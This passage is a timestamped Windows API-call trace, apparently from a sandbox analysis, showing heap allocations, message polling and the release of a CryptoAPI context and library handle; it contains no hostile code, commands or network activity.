lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0158.760] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0158.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0158.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0158.761] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0158.761] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0158.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0158.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0158.761] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0158.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0158.762] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0158.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0158.762] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0158.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0158.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0158.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0158.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0158.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0158.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0158.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0158.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0158.764] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0158.765] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0158.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0158.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0158.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0158.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0158.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0158.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0158.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0158.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0158.767] FreeLibrary (hLibModule=0x756e0000) returned 1 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0158.767] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0158.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0158.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0158.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0158.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0158.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0158.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0158.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0158.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0158.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0158.768] CloseHandle (hObject=0x2a0) returned 1 [0158.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0158.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0158.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0158.770] HeapFree (in: 